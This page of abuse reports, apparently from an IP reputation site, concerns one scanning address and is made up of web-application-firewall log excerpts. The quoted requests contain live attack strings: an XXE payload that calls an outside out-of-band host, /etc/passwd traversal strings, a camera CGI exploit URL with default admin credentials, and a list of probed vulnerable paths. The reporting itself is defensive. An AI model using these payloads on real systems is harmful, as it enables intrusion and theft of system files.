π¬πͺ
0x3b
2024-01-26 07:58:54
(2 years ago)
vulnerability scan web attack.
Port Scan
Hacking
Brute-Force
Web App Attack
π²πΎ
Rizzy
2024-01-26 00:17:34
(2 years ago)
Multiple WAF Violations
Brute-Force
Web App Attack
π§πͺ
holos.pt
2024-01-26 00:00:51
(2 years ago)
Blocked for XXE: External Entity Expansion in query string: <?xml version="1.0" ?><!DOCTYPE r [<!ELE ...
show more
Blocked for XXE: External Entity Expansion in query string: <?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://cmp829tnc6h5stbtr1s0xkj5k3zooa18j.oast.online/xxe.xml">%sp;%param1;]>
show less
Web App Attack
π§πͺ
holos.pt
2024-01-25 20:00:04
(2 years ago)
Blocked for Directory Traversal in query string: ../../etc/passwd0
Web App Attack
π¬π§
Aetherweb Ark
2024-01-25 19:30:04
(2 years ago)
(mod_security) mod_security (id:930100) triggered by 45.134.174.249 (UA/Ukraine/server.nomages.com): ...
show more
(mod_security) mod_security (id:930100) triggered by 45.134.174.249 (UA/Ukraine/server.nomages.com): N in the last X secs
show less
Web App Attack
πΊπΈ
TPI-Abuse
2024-01-25 18:56:56
(2 years ago)
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the l ...
show more
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jan 25 13:56:49.873078 2024] [security2:error] [pid 24083] [client 45.134.174.249:55936] [client 45.134.174.249] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||spyasociados.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "spyasociados.com"] [uri "/cgi-bin/wapopen"] [unique_id "ZbKu8Yy9k-rSNE1NRbqJ3gAAAAU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2024-01-25 17:36:48
(2 years ago)
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the l ...
show more
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jan 25 12:36:42.855023 2024] [security2:error] [pid 29964] [client 45.134.174.249:37348] [client 45.134.174.249] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||karenbernsteinlaw.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "karenbernsteinlaw.com"] [uri "/cgi-bin/wapopen"] [unique_id "ZbKcKm8-L_64vMvfqWoZyAAAAAk"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2024-01-25 17:17:46
(2 years ago)
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the l ...
show more
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jan 25 12:17:39.754415 2024] [security2:error] [pid 30514] [client 45.134.174.249:33122] [client 45.134.174.249] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||highaltitudebaking.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "highaltitudebaking.com"] [uri "/cgi-bin/wapopen"] [unique_id "ZbKXs1nBvLtprtA4gKm4eQAAACA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2024-01-25 16:42:38
(2 years ago)
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the l ...
show more
(mod_security) mod_security (id:211190) triggered by 45.134.174.249 (server.nomages.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jan 25 11:42:31.516874 2024] [security2:error] [pid 31720] [client 45.134.174.249:34160] [client 45.134.174.249] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||dmasoftlab.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "dmasoftlab.com"] [uri "/cgi-bin/wapopen"] [unique_id "ZbKPdxeG2pRT9YcVRR5YhgAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2024-01-25 16:35:02
(2 years ago)
| Common web attack.
Hacking
SQL Injection
Web App Attack
Anonymous
2024-01-25 16:34:07
(2 years ago)
apache vulnerability scan
Web App Attack
π¬π§
CrystalMaker
2024-01-25 16:33:51
(2 years ago)
Vulnerability scan - GET /free_time.cgi; POST /apply_sec.cgi; POST /apply_sec.cgi
Hacking
π¬π§
CrystalMaker
2024-01-25 16:33:45
(2 years ago)
ASP vulnerability scan - GET /cgi-bin/login?LD_DEBUG=files; GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REF ...
show more
ASP vulnerability scan - GET /cgi-bin/login?LD_DEBUG=files; GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0; GET /anchor/errors.log; GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession; GET /CMSInstall/install.aspx; GET /user/scripts/login_par.js; GET /html/log; GET /command/prima-factory.cgi; GET /html/device-id; GET /html/repository; GET /services/user/values.xml?var=STATUS; GET /current_config/Sha1Account1; POST /_search?pretty; POST /webtools/control/xmlrpc; GET /system/console?.css; GET /current_config/passwd; PUT /meta; POST /wls-wsat/RegistrationRequesterPortType; POST /XMLCHART; GET /jkstatus; GET /horde/admin/user.php; GET /jkstatus;; GET /admin/user.php; POST /axis2-admin/login; POST /axis2/axis2-admin/login; GET /verify.php?id=1&confirm_hash; GET /mantis/verify.php?id=1&confirm_hash; GET /mantisBT/verify.php?id=1&confirm_hash; G...
show less
Web App Attack